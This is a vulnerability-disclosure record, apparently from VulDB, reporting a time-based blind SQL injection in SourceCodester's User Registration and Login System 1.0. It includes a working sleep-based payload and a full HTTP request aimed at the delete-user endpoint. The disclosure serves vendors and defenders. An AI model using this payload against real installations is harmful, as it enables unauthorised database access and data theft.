| Title | https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 SQL Injection |
|---|
| Description | User Registration and Login System by rems has SQL Injection (Time-based Blind SQLi)
BUG_Author: hlhyp
vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html
dbname = registration_login_db
Vulnerability File: /endpoint/add-user.php ;/home.php
[+] payload: endpoint/delete-user.php?user=(select(0)from(select(sleep(4)))v)/'%2B(select(0)from(select(sleep(4)))v)%2B'"%2B(select(0)from(select(sleep(4)))v)%2B"/
GET /endpoint/delete-user.php?user=(select(0)from(select(sleep(4)))v)/*'%2B(select(0)from(select(sleep(4)))v)%2B'"%2B(select(0)from(select(sleep(4)))v)%2B"*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: 127.0.0.1
Connection: Keep-alive
|
|---|
| Source | ⚠️ https://github.com/qqisee/vulndis/blob/main/sqlInjection_delete_user.md |
|---|
| User | hlhyp (UID 59415) |
|---|
| Submission | 12/01/2023 09:31 (3 years ago) |
|---|
| Moderation | 12/01/2023 17:05 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 246614 [SourceCodester User Registration and Login System 1.0 /endpoint/add-user.php sql injection] |
|---|
| Points | 20 |
|---|